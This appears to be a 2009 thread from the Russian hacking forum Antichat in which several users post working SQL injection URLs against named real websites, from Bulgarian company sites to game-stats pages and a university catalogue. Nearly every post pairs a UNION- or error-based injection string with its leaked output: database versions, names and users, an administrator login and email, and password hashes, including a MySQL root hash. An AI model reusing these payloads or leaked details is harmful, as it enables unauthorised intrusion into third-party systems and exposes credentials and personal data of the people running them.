ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8581  
Старый 27.03.2009, 13:05
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6


Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost


http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5


Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost


Интересное дело, так как на сайте не было динамического параметра типа id= , я нашел вкладку новостей, но там всего лишь одна новость поэтому выглядело просто news.php , подтставил news.php?id=1 а дальше уже по класической схеме раскрутил скулю.

http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9

Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost

Последний раз редактировалось Gorev; 27.03.2009 в 13:15..
 
Ответить с цитированием

  #8582  
Старый 27.03.2009, 14:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.harryhomers.co.uk/et/stats/hhs/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
harry_headsh@localhost:harry_statshhs:5.0.67-community

Код:
http://whetstats.sonyonline.de/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
U480002@jenkins.storB480002:5.0.67-log

Код:
http://lapdclan.eu/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
lapdceba@localhost:usrdb_lapdceba_stats:5.0.51a

Код:
http://pro-q3dm6.de/27962/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27

Код:
http://theaodclan.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
theaod_vspuser@localhost:theaod_vsp:5.0.67-community

Код:
http://www.wolfet.fr/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log

Код:
http://vsp.creativehosting.nl/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@c1n1.86id.nl:vsp:5.0.32-Debian_7etch6-log

Код:
http://afterhourgamers.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
ahgamers_stats@localhost:ahgamers_stats:5.0.67-community

Код:
http://www.exiledunit.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
exiledun_stats@localhost:exiledun_stats:4.1.22-standard
 
Ответить с цитированием

  #8583  
Старый 27.03.2009, 15:22
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

site: kdvorik.ru
Код:
http://www.kdvorik.ru/katalog.php?r=-0+union+select+1,2,3,4,5,concat_ws(0x3a,name,email)+from+users--
database: 4.0.27-max-log
name_database: dvorik
user: dvorik@v46.valuehost.ru
http://www.kdvorik.ru/admin

column: users
log: asvitov
pass:
email: asvitov@avallon.ru
 
Ответить с цитированием

  #8584  
Старый 27.03.2009, 15:55
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Код:
http://www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1+--+
 
Ответить с цитированием

  #8585  
Старый 27.03.2009, 16:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.tamaltd.com/bg/products.php?gr=-5+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8


Database Version: 4.1.20
Database name: tamaltd
User name: tamaltd@localhost



http://www.farin.bg/medcontent.php?pub=n&med=-5+union+select+1,concat_ws(0x3a,version(),database (),useR())



Database Version: 5.0.32-Debian_7etch5-log
Database name: wdbn
User name: mrtn@localhost
 
Ответить с цитированием

  #8586  
Старый 27.03.2009, 16:52
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a3a 3a,id,username,password),3,4+from+users+--+

Вывод: 3:::admin:::6692e9c358a3031d
 
Ответить с цитированием

  #8587  
Старый 27.03.2009, 16:59
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.interay.eu/bg/product.php?brand=in_the_store&id=-9+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33



Database Version: 5.0.67-community
Database name: interay_interay
User name: interay_site@localhost




http://www.briz-bulgarian-properties.bg/en/property_details.php?id=-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),useR()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39


Database Version: 5.0.67-community
Database name: brizbg_BRIZ
User name: brizbg_site@localhost
 
Ответить с цитированием

  #8588  
Старый 27.03.2009, 17:06
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+having+1=1--

Вывод: tblProducts.ProductID


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID+having+1=1--

Вывод: tblProducts.ProductNam


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID, tblProducts.ProductName+having+1=1--

Вывод: tblProducts.PartNo
 
Ответить с цитированием

  #8589  
Старый 27.03.2009, 17:12
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.rollco-bg.com/en/news_pop_en.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),useR())


Database Version: 4.1.22
Database name: webrollco
User name: webrollco@webserv




http://www.longman-bulgaria.com/product.php?id=-137+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),useR()),5,6,7,8,9,10,11,12,13

Database Version: 5.0.67-community
Database name: longman_longman
User name: longman_site@localhost
 
Ответить с цитированием

  #8590  
Старый 27.03.2009, 17:48
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+mysql.user+limit+1,1/*
version():4.1.22-log
database():avnetweb
user():AVNetWEBuser@localhost

Код:
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+concat(user,0x3a,password),concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+mysql.user+limit+1,1/*
root:58ca972b03220752
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ